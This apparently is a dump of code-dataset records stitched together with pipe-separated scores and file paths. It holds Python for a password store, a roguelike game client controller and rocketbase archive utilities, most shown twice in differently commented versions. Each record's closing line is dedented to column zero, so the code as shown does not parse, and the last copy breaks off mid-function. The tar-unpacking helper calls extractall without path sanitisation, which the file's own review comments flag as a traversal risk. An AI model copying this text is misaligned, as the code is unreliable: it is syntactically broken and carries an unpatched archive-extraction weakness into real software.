        session.commit()

    def get_all(self, key):
        """Return every record as a dict, with values decrypted via *key*."""
        results = []
        for record in self.model.get_all(self._db_session):
            record.value = decrypt(key, record.value)
            results.append(record.to_dict())
        return results

    def get_by_name(self, key, name):
        """Return a one-element list with the decrypted record, or []."""
        record = self.model.get_by_name(name, self._db_session)
        if not record:
            return []
        record.value = decrypt(key, record.value)
        return [record.to_dict()]

    def update(self, key, field, value, field_to_update, new_value):
        """Update one field on records matching ``field == value``; commit."""
        if field_to_update == 'value':
            # Stored password values are always kept encrypted.
            new_value = encrypt(key, new_value)
        self.model.update_by_field(
            field=field,
            value=value,
            field_to_update=field_to_update,
            new_value=new_value,
            session=self._db_session
        )
        self._db_session.commit()
        # NOTE(review): this prints the *field* name, not the record name —
        # confirm the intended message.
        print(f'Updated record with name = {field_to_update}')

    def delete(self, name):
        """Delete the record called *name* and commit."""
        self.model.delete_by_name(name=name, session=self._db_session)
        self._db_session.commit()
print(f'Deleted record with name = {name}') | 0.789153 | 0.153676 |
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Union
from game import Position
from game.client.controller.menu import Menu
from game.client.model.action import Action, ActionType, MoveAction, InventoryAction, ItemAction
from game.client.model.model import Model
from game.client.view.user_command import UserCommand
from game.client.view.view import View
class Controller:
    """Client-side game controller.

    Owns the model, view and menu, drives the main loop, translates user
    commands into actions and exchanges state/actions with the server.
    """

    FRAMES_PER_SECOND = 20  # polling rate of the turn loop
    GAME_CONFIG_PATH = Path('resources', 'config', 'game_config.json')
    ENTITIES_CONFIG_PATH = Path('resources', 'config', 'entities.json')
    LOG_DIR_PATH = Path('resources', 'logs')

    def __init__(self, *args, **kwargs):
        """Load the JSON configs, create model/view and set up file logging."""
        with self.GAME_CONFIG_PATH.open('r') as src:
            self.game_config = json.load(src)
        with self.ENTITIES_CONFIG_PATH.open('r') as src:
            self.entities_desc = json.load(src)
        self.model = Model()
        self.menu = None  # created anew for every round in start_game
        self.view = View(self, self.model, self.entities_desc)
        self.logger = logging.getLogger(self.__class__.__name__)
        self.logger.setLevel(logging.DEBUG)
        self._create_log_handler()

    def _create_log_handler(self):
        """Attach an INFO-level file handler writing to a timestamped log file."""
        if not Controller.LOG_DIR_PATH.exists():
            Controller.LOG_DIR_PATH.mkdir()
        current_date = datetime.now().strftime('%Y.%m.%d %H.%M.%S')
        log_name = 'client {}.txt'.format(current_date)
        log_file = Controller.LOG_DIR_PATH / log_name
        file_handler = logging.FileHandler(str(log_file))
        file_handler.setLevel(logging.INFO)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%m/%d/%Y %I:%M:%S %p')
        file_handler.setFormatter(formatter)
        self.logger.addHandler(file_handler)

    def start_game(self):
        """
        Starts the game on the client side.
        Processes all user actions and interacts with server.
        """
        self.view.create()
        error = None
        self.logger.info('Game started')
        while True:
            self.logger.info('On new game stage')
            self.view.initialize()
            self.menu = Menu(self.view, error)
            error = None
            try:
                self.logger.info('On make_choice stage')
                network = self.menu.make_choice()
                if network is None:
                    self.logger.info('No network received, possible exit button was clicked')
                    break
                self.logger.info(f'Network was successfully created, singleplayer mode: {network.singleplayer}')
                if not network.singleplayer:
                    self.view.set_game_id(network.game_id)
                else:
                    self.view.set_game_id(None)
                self.logger.info('Starting game loop')
                while True:
                    self.logger.info('Receiving game state...')
                    state = network.get_state()
                    self.logger.info('Success')
                    self.model.update(state)
                    self.view.refresh_game()
                    if self.model.hero.stats.health == 0:
                        # Hero is dead: only react to QUIT, drain other input.
                        quit = False
                        while self.view.has_user_commands():
                            cmd = self.view.get_user_command()
                            if cmd == UserCommand.QUIT:
                                quit = True
                        if quit:
                            break
                    else:
                        self.view.clear_user_command_queue()
                        if state.my_turn:
                            action = self._get_user_action()
                            if action is None:
                                continue
                            network.send_action(action)
                            if action.type == ActionType.QUIT_ACTION:
                                break
                    self.view.delay(1.0 / self.FRAMES_PER_SECOND)
                self.logger.info('Game successfully finished')
            except Exception as e:
                # Any failure in the server round-trip is treated as a
                # disconnect; the message is shown in the next menu.
                error = 'Disconnected from server'
                self.logger.error('Disconnected from server')
                self.logger.exception(e)
            finally:
                self.menu.destroy()
                self.view.destroy()

    def _get_user_action(self) -> Union[Action, None]:
        """Poll the view until a complete user action is formed.

        Returns None when the pending input does not produce an action
        (unknown key, blocked move, cancelled inventory).
        """
        while True:
            cmd = self.view.get_user_command()
            if cmd is UserCommand.UNKNOWN:
                return None
            if cmd in [UserCommand.UP, UserCommand.DOWN, UserCommand.LEFT, UserCommand.RIGHT, UserCommand.SKIP]:
                action = self._process_move(cmd)
                if action is not None:
                    return action
                continue
            if cmd == UserCommand.INVENTORY:
                action = self._process_inventory()
                if action is not None:
                    return action
                continue
            if cmd == UserCommand.QUIT:
                action = Action(type=ActionType.QUIT_ACTION, desc=None)
                return action
            # TODO add processing of other available commands

    def _process_move(self, cmd: UserCommand) -> Union[Action, None]:
        """Translate a movement command into a MOVE action, or None on a wall."""
        # Row/column deltas per movement command; SKIP stays in place.
        dr, dc = {UserCommand.UP: (-1, 0),
                  UserCommand.DOWN: (+1, 0),
                  UserCommand.LEFT: ( 0, -1),
                  UserCommand.RIGHT: ( 0, +1),
                  UserCommand.SKIP: ( 0, 0)}[cmd]
        hero_position = self.model.hero.position
        new_position = Position.as_position(hero_position.row + dr, hero_position.col + dc)
        if self.model.labyrinth.is_wall(new_position):
            return None
        return Action(type=ActionType.MOVE_ACTION,
                      desc=MoveAction(row=new_position.row, column=new_position.col))

    def _process_inventory(self) -> Union[Action, None]:
        """Run the modal inventory screen; return the chosen USE/DROP action or None."""
        inventory = self.model.inventory
        inventory.open()
        self.view.refresh_game()
        action = None
        while True:
            cmd = self.view.get_user_command()
            if cmd == UserCommand.INVENTORY:
                break  # toggling inventory again closes it without an action
            if cmd == UserCommand.DOWN:
                inventory.select_next_item()
                self.view.refresh_game()
                continue
            if cmd == UserCommand.UP:
                inventory.select_previous_item()
                self.view.refresh_game()
                continue
            if inventory.no_item_selected():
                continue
            if cmd == UserCommand.USE:
                item_id = inventory.get_selected_item_position()
                action = Action(type=ActionType.INVENTORY_ACTION,
                                desc=InventoryAction(item_id=item_id, action=ItemAction.USE))
                break
            if cmd == UserCommand.DROP:
                item_id = inventory.get_selected_item_position()
                action = Action(type=ActionType.INVENTORY_ACTION,
                                desc=InventoryAction(item_id=item_id, action=ItemAction.DROP))
                break
        inventory.close()
        self.view.refresh_game()
return action | game/client/controller/controller.py | import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Union
from game import Position
from game.client.controller.menu import Menu
from game.client.model.action import Action, ActionType, MoveAction, InventoryAction, ItemAction
from game.client.model.model import Model
from game.client.view.user_command import UserCommand
from game.client.view.view import View
class Controller:
    """Client-side game controller.

    Owns the model, view and menu, drives the main loop, translates user
    commands into actions and exchanges state/actions with the server.
    """

    FRAMES_PER_SECOND = 20  # polling rate of the turn loop
    GAME_CONFIG_PATH = Path('resources', 'config', 'game_config.json')
    ENTITIES_CONFIG_PATH = Path('resources', 'config', 'entities.json')
    LOG_DIR_PATH = Path('resources', 'logs')

    def __init__(self, *args, **kwargs):
        """Load the JSON configs, create model/view and set up file logging."""
        with self.GAME_CONFIG_PATH.open('r') as src:
            self.game_config = json.load(src)
        with self.ENTITIES_CONFIG_PATH.open('r') as src:
            self.entities_desc = json.load(src)
        self.model = Model()
        self.menu = None  # created anew for every round in start_game
        self.view = View(self, self.model, self.entities_desc)
        self.logger = logging.getLogger(self.__class__.__name__)
        self.logger.setLevel(logging.DEBUG)
        self._create_log_handler()

    def _create_log_handler(self):
        """Attach an INFO-level file handler writing to a timestamped log file."""
        if not Controller.LOG_DIR_PATH.exists():
            Controller.LOG_DIR_PATH.mkdir()
        current_date = datetime.now().strftime('%Y.%m.%d %H.%M.%S')
        log_name = 'client {}.txt'.format(current_date)
        log_file = Controller.LOG_DIR_PATH / log_name
        file_handler = logging.FileHandler(str(log_file))
        file_handler.setLevel(logging.INFO)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%m/%d/%Y %I:%M:%S %p')
        file_handler.setFormatter(formatter)
        self.logger.addHandler(file_handler)

    def start_game(self):
        """
        Starts the game on the client side.
        Processes all user actions and interacts with server.
        """
        self.view.create()
        error = None
        self.logger.info('Game started')
        while True:
            self.logger.info('On new game stage')
            self.view.initialize()
            self.menu = Menu(self.view, error)
            error = None
            try:
                self.logger.info('On make_choice stage')
                network = self.menu.make_choice()
                if network is None:
                    self.logger.info('No network received, possible exit button was clicked')
                    break
                self.logger.info(f'Network was successfully created, singleplayer mode: {network.singleplayer}')
                if not network.singleplayer:
                    self.view.set_game_id(network.game_id)
                else:
                    self.view.set_game_id(None)
                self.logger.info('Starting game loop')
                while True:
                    self.logger.info('Receiving game state...')
                    state = network.get_state()
                    self.logger.info('Success')
                    self.model.update(state)
                    self.view.refresh_game()
                    if self.model.hero.stats.health == 0:
                        # Hero is dead: only react to QUIT, drain other input.
                        quit = False
                        while self.view.has_user_commands():
                            cmd = self.view.get_user_command()
                            if cmd == UserCommand.QUIT:
                                quit = True
                        if quit:
                            break
                    else:
                        self.view.clear_user_command_queue()
                        if state.my_turn:
                            action = self._get_user_action()
                            if action is None:
                                continue
                            network.send_action(action)
                            if action.type == ActionType.QUIT_ACTION:
                                break
                    self.view.delay(1.0 / self.FRAMES_PER_SECOND)
                self.logger.info('Game successfully finished')
            except Exception as e:
                # Any failure in the server round-trip is treated as a
                # disconnect; the message is shown in the next menu.
                error = 'Disconnected from server'
                self.logger.error('Disconnected from server')
                self.logger.exception(e)
            finally:
                self.menu.destroy()
                self.view.destroy()

    def _get_user_action(self) -> Union[Action, None]:
        """Poll the view until a complete user action is formed.

        Returns None when the pending input does not produce an action
        (unknown key, blocked move, cancelled inventory).
        """
        while True:
            cmd = self.view.get_user_command()
            if cmd is UserCommand.UNKNOWN:
                return None
            if cmd in [UserCommand.UP, UserCommand.DOWN, UserCommand.LEFT, UserCommand.RIGHT, UserCommand.SKIP]:
                action = self._process_move(cmd)
                if action is not None:
                    return action
                continue
            if cmd == UserCommand.INVENTORY:
                action = self._process_inventory()
                if action is not None:
                    return action
                continue
            if cmd == UserCommand.QUIT:
                action = Action(type=ActionType.QUIT_ACTION, desc=None)
                return action
            # TODO add processing of other available commands

    def _process_move(self, cmd: UserCommand) -> Union[Action, None]:
        """Translate a movement command into a MOVE action, or None on a wall."""
        # Row/column deltas per movement command; SKIP stays in place.
        dr, dc = {UserCommand.UP: (-1, 0),
                  UserCommand.DOWN: (+1, 0),
                  UserCommand.LEFT: ( 0, -1),
                  UserCommand.RIGHT: ( 0, +1),
                  UserCommand.SKIP: ( 0, 0)}[cmd]
        hero_position = self.model.hero.position
        new_position = Position.as_position(hero_position.row + dr, hero_position.col + dc)
        if self.model.labyrinth.is_wall(new_position):
            return None
        return Action(type=ActionType.MOVE_ACTION,
                      desc=MoveAction(row=new_position.row, column=new_position.col))

    def _process_inventory(self) -> Union[Action, None]:
        """Run the modal inventory screen; return the chosen USE/DROP action or None."""
        inventory = self.model.inventory
        inventory.open()
        self.view.refresh_game()
        action = None
        while True:
            cmd = self.view.get_user_command()
            if cmd == UserCommand.INVENTORY:
                break  # toggling inventory again closes it without an action
            if cmd == UserCommand.DOWN:
                inventory.select_next_item()
                self.view.refresh_game()
                continue
            if cmd == UserCommand.UP:
                inventory.select_previous_item()
                self.view.refresh_game()
                continue
            if inventory.no_item_selected():
                continue
            if cmd == UserCommand.USE:
                item_id = inventory.get_selected_item_position()
                action = Action(type=ActionType.INVENTORY_ACTION,
                                desc=InventoryAction(item_id=item_id, action=ItemAction.USE))
                break
            if cmd == UserCommand.DROP:
                item_id = inventory.get_selected_item_position()
                action = Action(type=ActionType.INVENTORY_ACTION,
                                desc=InventoryAction(item_id=item_id, action=ItemAction.DROP))
                break
        inventory.close()
        self.view.refresh_game()
return action | 0.412057 | 0.060947 |
import json
import hashlib
import os
import tarfile
import rocketbase.exceptions
# --- CONSTANTS ---
# Metadata fields that every Rocket's info.json must provide
# (validated in import_rocket_info_from_rocket_folder).
LIST_REQUIRED_INFO = [
    'username',
    'modelName',
    'family',
    'trainingDataset',
    'isTrainable',
    'rocketRepoUrl',
    'originRepoUrl',
    'description',
    'blueprint'
]
# Task families a Rocket may declare; anything else is rejected on import.
LIST_ROCKET_FAMILIES = [
    'image_object_detection',
    'image_human_pose_estimation',
    'image_classification',
    'image_superresolution',
    'image_style_transfer',
    'image_segmentation',
    'image_instance_segmentation'
]
# --- TAR ARCHIVE ---
def unpack_tar_to_rocket(tar_path: str, rocket_folder_name: str, folder_path: str, remove_after_unpack: bool = True):
    """Extract a Rocket tar archive into *folder_path* and rename it.

    The archive's own top-level folder name is replaced by
    *rocket_folder_name*; the tar file is then deleted unless
    *remove_after_unpack* is False.

    NOTE(review): ``extractall`` is used without member sanitisation, so a
    crafted archive could write outside *folder_path* (tar path traversal).
    Consider the ``filter="data"`` argument available on Python 3.12+.

    Args:
        tar_path (str): path to the tar file containing the Rocket.
        rocket_folder_name (str): desired name for the unpacked folder.
        folder_path (str): directory the Rocket is unpacked into.
        remove_after_unpack (bool, optional): delete the tar afterwards.

    Returns:
        str: path to the unpacked Rocket folder.
    """
    with tarfile.open(tar_path, 'r') as archive:
        # The archive is expected to contain one top-level folder; its name
        # is the common prefix of all member names.
        extracted_name = os.path.commonprefix(archive.getnames())
        archive.extractall(folder_path)
    # Rename the extracted folder to the requested Rocket folder name.
    rocket_folder_path = os.path.join(folder_path, rocket_folder_name)
    os.rename(os.path.join(folder_path, extracted_name), rocket_folder_path)
    if remove_after_unpack:
        os.remove(tar_path)
    return rocket_folder_path
def pack_rocket_to_tar(rocket_path: str, rocket_folder_name: str, blueprint: list):
    """Archive a Rocket's blueprint files into ``<rocket_path>_ready_for_launch.tar``.

    Each entry of *blueprint* is added relative to *rocket_folder_name*
    inside the archive; directory entries are added recursively by tarfile.

    Args:
        rocket_path (str): folder containing the Rocket's files.
        rocket_folder_name (str): slug used as the archive's top-level folder.
        blueprint (list): filenames inside the Rocket folder to include.

    Returns:
        str: path to the newly created tar file.
    """
    tar_path = rocket_path + '_ready_for_launch.tar'
    with tarfile.open(tar_path, "w") as archive:
        for filename in blueprint:
            # Re-root each entry so the archive does not expose local paths.
            archive.add(
                name=os.path.join(rocket_path, filename),
                arcname=os.path.join(rocket_folder_name, filename),
            )
    return tar_path
def get_file_sha1_hash(file_path: str):
    """Compute the SHA-1 hash of a file.

    The file is read in fixed-size chunks and fed to the hash
    incrementally, so arbitrarily large files can be hashed without
    loading them fully into memory (the previous implementation read
    the whole file at once).

    Args:
        file_path (str): Path to the file we want to compute the hash from.

    Returns:
        hash (str): SHA-1 hex digest of the referenced file.

    Raises:
        RocketHashNotValid: If the computed digest does not have the
            expected LENGTH_SHA1_HASH length.
    """
    LENGTH_SHA1_HASH = 40  # hex-digest length of SHA-1
    sha1 = hashlib.sha1()
    with open(file_path, 'rb') as f:
        # 64 KiB chunks: large enough for throughput, small enough for RAM.
        for chunk in iter(lambda: f.read(1 << 16), b''):
            sha1.update(chunk)
    file_hash = sha1.hexdigest()
    if len(file_hash) != LENGTH_SHA1_HASH:
        raise rocketbase.exceptions.RocketHashNotValid(
            'SHA-1 hash computation failed on file: {}'.format(file_path))
    return file_hash
# --- ROCKET INFO + CONVERSION ---
def convert_slug_to_dict(rocket_slug: str, parsing_char: str = '/', version_type: str = 'label') -> dict:
    """Convert a Rocket slug to a dictionary.

    A slug looks like ``<username><sep><modelName>[<sep><hash-or-label>]``
    (e.g. ``igor/retinanet``). The whole slug is lower-cased; the optional
    trailing part is stored under the *version_type* key.

    Args:
        rocket_slug (str): slug of the Rocket.
        parsing_char (str): character separating the slug components.
        version_type (str): key under which the optional version part is
            stored ('label' or 'hash').

    Returns:
        rocket_info (dict): {'username': ..., 'modelName': ...} plus the
            optional version entry.

    Raises:
        RocketNotEnoughInfo: If the username and/or the modelName are
            missing from the slug.
    """
    # Cast the rocket_slug to a String with lower case
    rocket_slug = str(rocket_slug).lower()
    # Check if the rocket_slug is not empty
    if not rocket_slug:
        raise rocketbase.exceptions.RocketNotEnoughInfo(
            'Please specify the slug of the Rocket you want to get (e.g. <username>/<modelName>).')
    # Parse the Rocket url
    rocket_parsed = rocket_slug.split(parsing_char)
    # Fix: the old `if not rocket_parsed` check could never trigger (split
    # on a non-empty string always yields at least one item), so a slug
    # without a modelName crashed with IndexError instead of raising a
    # helpful error. Require both username and modelName explicitly.
    if len(rocket_parsed) < 2:
        raise rocketbase.exceptions.RocketNotEnoughInfo(
            '\'{}\' is not a correct slug for a Rocket. Please provide more information about the Rocket you want to get (<username>/<modelName>).'.format(rocket_slug))
    rocket_username = str(rocket_parsed[0])
    rocket_modelName = str(rocket_parsed[1])
    rocket_info = {'username': rocket_username, 'modelName': rocket_modelName}
    # Check if a specific hash or label has been precised
    if len(rocket_parsed) > 2:
        # Re-join the remainder so labels may themselves contain the
        # separator character.
        rocket_label = parsing_char.join(rocket_parsed[2:])
        rocket_info[version_type] = rocket_label
    return rocket_info
def get_list_rocket_info_from_folder(folder_path: str) -> list:
    """Build rocket_info dicts from the Rocket folder names in *folder_path*.

    Hidden entries and names without at least two underscores (i.e. not of
    the ``username_modelName_hash`` form) are ignored.

    Args:
        folder_path (str): directory containing the Rocket folders.

    Returns:
        list: one rocket_info dict per matching folder name.
    """
    candidates = (
        name for name in os.listdir(folder_path)
        if not name.startswith('.') and name.count('_') >= 2
    )
    return [convert_slug_to_dict(name, '_', 'hash') for name in candidates]
def convert_dict_to_foldername(rocket_info: dict, separation_char: str = '_', include_hash = True) -> str:
    """Join a Rocket's identifying fields into its folder name.

    Args:
        rocket_info (dict): information about the Rocket.
        separation_char (str): character placed between the fields.
        include_hash (bool): Default True. Whether the Rocket hash is part
            of the folder name.

    Returns:
        str: ``username<sep>modelName[<sep>hash]``.

    Raises:
        RocketNotEnoughInfo: if a required field is missing from
            *rocket_info*.
    """
    # Fields required for the folder name, in output order.
    required_fields = ['username', 'modelName'] + (['hash'] if include_hash else [])
    missing_info = set(required_fields) - rocket_info.keys()
    if missing_info:
        raise rocketbase.exceptions.RocketNotEnoughInfo(
            'Missing the following information to create the Rocket\'s folder name: ' + ', '.join(missing_info))
    return str(separation_char).join(rocket_info[field] for field in required_fields)
def import_rocket_info_from_rocket_folder(rocket_folder_path: str, metadata_json_filename: str = 'info.json'):
    """ Import the metadata information about a Rocket from its folder.
    Import the information in the json file named with <metadata_json_filename> and check the information to see if they corresponds to LIST_REQUIRED_INFO and LIST_ROCKET_FAMILIES.
    Args:
        rocket_folder_path (str): path to the Rocket's folder
        metadata_json_filename (str): name of the .json file containing the metadata information about the Rocket.
    Returns:
        rocket_info (dict): dictionary containing all the Rocket metadata information.
    Raises:
        RocketNotEnoughInfo: If there is not enough information in the json file to launch the Rocket.
        RocketInfoFormat: If some information about the Rocket are not formatted the right way.
    """
    # Path to the file containing the information about the Rocket
    metadata_json_path = os.path.join(
        rocket_folder_path, metadata_json_filename)
    # Load the information from the .json file
    with open(metadata_json_path) as info_json:
        rocket_info = json.load(info_json)
    # -- INFO CHECK --
    # Check if some fields are missing
    missing_info = set(LIST_REQUIRED_INFO) - rocket_info.keys()
    if missing_info:
        raise rocketbase.exceptions.RocketNotEnoughInfo(
            'Missing some information about the Rocket in the file: ' + metadata_json_path + '. Missing the following information: ' + ', '.join(missing_info))
    # Check if some info are empty (booleans are exempt: False is a value)
    list_empty_info = [key for key, item in rocket_info.items() if not isinstance(
        item, bool) and not item and key in LIST_REQUIRED_INFO]
    if list_empty_info:
        raise rocketbase.exceptions.RocketNotEnoughInfo('Missing some information about the Rocket in the file: ' +
                                                        metadata_json_path + '. Please provide more information for the following field(s): ' + ', '.join(list_empty_info))
    # '_' is the separator inside Rocket folder names, so it is forbidden
    # in the username...
    if '_' in rocket_info['username']:
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\', the username \'{}\' is not valid. It can\'t contains a \'_\'.'.format(metadata_json_path, rocket_info['username']))
    # ...and in the modelName, for the same reason.
    if '_' in rocket_info['modelName']:
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\', the modelName \'{}\' is not valid. It can\'t contains a \'_\'.'.format(metadata_json_path, rocket_info['modelName']))
    # Check if the rocket family is in the list of valid families
    if not rocket_info['family'] in LIST_ROCKET_FAMILIES:
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\', the family \'{}\' is not valid. Please refer to the documentation for a list of valid family names.'.format(metadata_json_path, rocket_info['family']))
    # Check if isTrainable is a boolean
    if not isinstance(rocket_info['isTrainable'], bool):
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\',the field isTrainable needs to be a Boolean'.format(
                metadata_json_path))
    # Check if blueprint is a list
    if not isinstance(rocket_info['blueprint'], list):
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\',the field blueprint needs to be a list of filenames.'.format(
                metadata_json_path))
return rocket_info | rocketbase/utils.py | import json
import hashlib
import os
import tarfile
import rocketbase.exceptions
# --- CONSTANTS ---
# List of all the required information
# Every key listed here must be present (and non-empty) in a Rocket's
# metadata json file; import_rocket_info_from_rocket_folder enforces this.
LIST_REQUIRED_INFO = [
    'username',
    'modelName',
    'family',
    'trainingDataset',
    'isTrainable',
    'rocketRepoUrl',
    'originRepoUrl',
    'description',
    'blueprint'
]
# List of all the valid Rocket families
# The 'family' metadata field must be exactly one of these task identifiers.
LIST_ROCKET_FAMILIES = [
    'image_object_detection',
    'image_human_pose_estimation',
    'image_classification',
    'image_superresolution',
    'image_style_transfer',
    'image_segmentation',
    'image_instance_segmentation'
]
# --- TAR ARCHIVE ---
def unpack_tar_to_rocket(tar_path: str, rocket_folder_name: str, folder_path: str, remove_after_unpack: bool = True):
    """Unpack a tar archive to a Rocket folder.

    Extracts the archive into *folder_path*, renames the extracted top-level
    directory to *rocket_folder_name* and optionally removes the tar file.

    Args:
        tar_path (str): path to the tar file containing the Rocket which should be unpacked.
        rocket_folder_name (str): folder name for the Rocket (to change the one from the tar file).
        folder_path (str): folder where the Rocket should be moved once unpacked.
        remove_after_unpack (bool, optional): choose to remove the tar file once the Rocket is unpacked. Defaults to True.

    Returns:
        rocket_folder_path (str): path to the Rocket folder once unpacked.
    """
    with tarfile.open(tar_path, 'r') as t:
        # os.path.commonprefix is character-based and can return a string that
        # is not an actual directory (e.g. 'foo' for members 'foo1/x' and
        # 'foo2/y'), which would make the rename below fail or rename the
        # wrong path; os.path.commonpath compares whole path components.
        tar_folder_name = os.path.commonpath(t.getnames())
        # NOTE(review): extractall on an untrusted archive is vulnerable to
        # path traversal ('../' members); consider validating member names.
        t.extractall(folder_path)  # unpack under the archive's own folder name
    # Rename the extracted top-level folder to the requested Rocket name
    rocket_folder_path = os.path.join(folder_path, rocket_folder_name)
    os.rename(os.path.join(folder_path, tar_folder_name), rocket_folder_path)
    if remove_after_unpack:
        os.remove(tar_path)
    return rocket_folder_path
def pack_rocket_to_tar(rocket_path: str, rocket_folder_name: str, blueprint: list):
    """Pack a Rocket's blueprint files into a tar archive.

    Only the files listed in *blueprint* are included; each entry is stored
    under *rocket_folder_name* inside the archive so the full local path does
    not leak into the tar file.

    Args:
        rocket_path (str): path to the Rocket folder containing the files to pack.
        rocket_folder_name (str): slug of the Rocket without the hash and with underscore (e.g. username_modelName).
        blueprint (List[str]): files in the Rocket's folder to include in the tar file.

    Notes:
        If a blueprint entry is a folder, tarfile adds its contents recursively.

    Returns:
        tar_path (str): path to the newly created tar file containing the Rocket.
    """
    tar_path = rocket_path + '_ready_for_launch.tar'
    with tarfile.open(tar_path, "w") as archive:
        for blueprint_file in blueprint:
            source_path = os.path.join(rocket_path, blueprint_file)
            # Re-root the entry under the Rocket's slug inside the archive
            archive_path = os.path.join(rocket_folder_name, blueprint_file)
            archive.add(name=source_path, arcname=archive_path)
    return tar_path
def get_file_sha1_hash(file_path: str):
    """Compute the SHA-1 hash of a file.

    Args:
        file_path (str): Path to the file we want to compute the hash from.

    Returns:
        hash (str): SHA-1 hash (40 hex characters) of the referenced file.

    Raises:
        RocketHashNotValid: If the computed SHA-1 has a different length from LENGTH_SHA1_HASH.
    """
    LENGTH_SHA1_HASH = 40
    sha1 = hashlib.sha1()
    with open(file_path, 'rb') as f:
        # Stream the file in fixed-size chunks instead of loading it fully
        # into memory (the previous implementation read the whole file at once,
        # which does not scale to large model weights).
        for chunk in iter(lambda: f.read(65536), b''):
            sha1.update(chunk)
    file_hash = sha1.hexdigest()
    if len(file_hash) != LENGTH_SHA1_HASH:
        raise rocketbase.exceptions.RocketHashNotValid(
            'SHA-1 hash computation failed on file: {}'.format(file_path))
    return file_hash
# --- ROCKET INFO + CONVERSION ---
def convert_slug_to_dict(rocket_slug: str, parsing_char: str = '/', version_type: str = 'label') -> dict:
    """Convert a Rocket slug to a dictionary.

    A slug has the shape <username><parsing_char><modelName>[<parsing_char><hash or label>]
    (e.g. igor/retinanet). The optional trailing part is stored under the
    *version_type* key and is omitted from the result when absent.

    Args:
        rocket_slug (str): The Rocket slug in the shape <username>/<modelName>/(<hash> or <label>).
        parsing_char (str): The character used to parse the information in the slug.
        version_type (str): The key to define the version (either label or hash).

    Returns:
        rocket_info (dict): A dict containing the information provided in rocket_slug.

    Raises:
        RocketNotEnoughInfo: If the <username> and/or the <modelName> of the Rocket are missing in the Rocket slug.
    """
    # Slugs are treated case-insensitively
    rocket_slug = str(rocket_slug).lower()
    if not rocket_slug:
        raise rocketbase.exceptions.RocketNotEnoughInfo(
            'Please specify the slug of the Rocket you want to get (e.g. <username>/<modelName>).')
    rocket_parsed = rocket_slug.split(parsing_char)
    # Fixed: str.split always returns at least one element, so the previous
    # 'if not rocket_parsed' check could never fire and a slug without a
    # modelName crashed with IndexError instead of the documented exception.
    if len(rocket_parsed) < 2:
        raise rocketbase.exceptions.RocketNotEnoughInfo(
            '\'{}\' is not a correct slug for a Rocket. Please provide more information about the Rocket you want to get (<username>/<modelName>).'.format(rocket_slug))
    rocket_username = str(rocket_parsed[0])
    rocket_modelName = str(rocket_parsed[1])
    rocket_info = {'username': rocket_username, 'modelName': rocket_modelName}
    # Everything after the second field is the version (hash or label); it may
    # itself contain the parsing character, so re-join the remainder.
    if len(rocket_parsed) > 2:
        rocket_label = parsing_char.join(rocket_parsed[2:])
        rocket_info[version_type] = rocket_label
    return rocket_info
def get_list_rocket_info_from_folder(folder_path: str) -> list:
    """Get the list of rocket_info from folders name inside of a folder.

    Args:
        folder_path (str): Path to the folder containing the folders of the Rockets.

    Returns:
        list_rocket_info (list): List of rocket_info of all the folders of the Rockets in folder_path.
    """
    # Rocket folders are named <username>_<modelName>_<hash>, hence at least
    # two underscores; hidden entries (dotfiles) are skipped.
    candidate_names = (
        entry for entry in os.listdir(folder_path)
        if not entry.startswith('.') and entry.count('_') >= 2
    )
    return [convert_slug_to_dict(entry, '_', 'hash') for entry in candidate_names]
def convert_dict_to_foldername(rocket_info: dict, separation_char: str = '_', include_hash = True) -> str:
    """Convert a dict containing the information about a Rocket to a folder name.

    Args:
        rocket_info (dict): Dictionary containing the information about a Rocket.
        separation_char (str): Character used to separate the information in the name of the folder.
        include_hash (bool): Default True. Boolean to include the hash of the Rocket in the folder name.

    Returns:
        rocket_folder_name (str): Name of the folder containing the Rocket.

    Raises:
        RocketNotEnoughInfo: If there are not enough information to create the folder name.
    """
    # Keys that must be present, in the order they appear in the folder name
    required_keys = ['username', 'modelName']
    if include_hash:
        required_keys.append('hash')
    missing_info = set(required_keys) - rocket_info.keys()
    if missing_info:
        raise rocketbase.exceptions.RocketNotEnoughInfo(
            'Missing the following information to create the Rocket\'s folder name: ' + ', '.join(missing_info))
    name_parts = [rocket_info[key] for key in required_keys]
    return str(separation_char).join(name_parts)
def import_rocket_info_from_rocket_folder(rocket_folder_path: str, metadata_json_filename: str = 'info.json'):
    """Import the metadata information about a Rocket from its folder.

    Loads <metadata_json_filename> from the Rocket's folder and validates the
    content against LIST_REQUIRED_INFO and LIST_ROCKET_FAMILIES.

    Args:
        rocket_folder_path (str): path to the Rocket's folder.
        metadata_json_filename (str): name of the .json file containing the metadata information about the Rocket.

    Returns:
        rocket_info (dict): dictionary containing all the Rocket metadata information.

    Raises:
        RocketNotEnoughInfo: If there is not enough information in the json file to launch the Rocket.
        RocketInfoFormat: If some information about the Rocket are not formatted the right way.
    """
    # Path to the file containing the information about the Rocket
    metadata_json_path = os.path.join(
        rocket_folder_path, metadata_json_filename)
    # Load the information from the .json file
    with open(metadata_json_path) as info_json:
        rocket_info = json.load(info_json)
    # -- INFO CHECK --
    # Required keys that are absent altogether
    missing_info = set(LIST_REQUIRED_INFO) - rocket_info.keys()
    if missing_info:
        raise rocketbase.exceptions.RocketNotEnoughInfo(
            'Missing some information about the Rocket in the file: ' + metadata_json_path + '. Missing the following information: ' + ', '.join(missing_info))
    # Required keys that are present but empty (booleans are exempt because
    # False is a legitimate value)
    list_empty_info = [key for key, item in rocket_info.items() if not isinstance(
        item, bool) and not item and key in LIST_REQUIRED_INFO]
    if list_empty_info:
        raise rocketbase.exceptions.RocketNotEnoughInfo('Missing some information about the Rocket in the file: ' +
                                                        metadata_json_path + '. Please provide more information for the following field(s): ' + ', '.join(list_empty_info))
    # '_' is the folder-name separator, so it is forbidden in username/modelName
    if '_' in rocket_info['username']:
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\', the username \'{}\' is not valid. It can\'t contains a \'_\'.'.format(metadata_json_path, rocket_info['username']))
    if '_' in rocket_info['modelName']:
        raise rocketbase.exceptions.RocketInfoFormat(
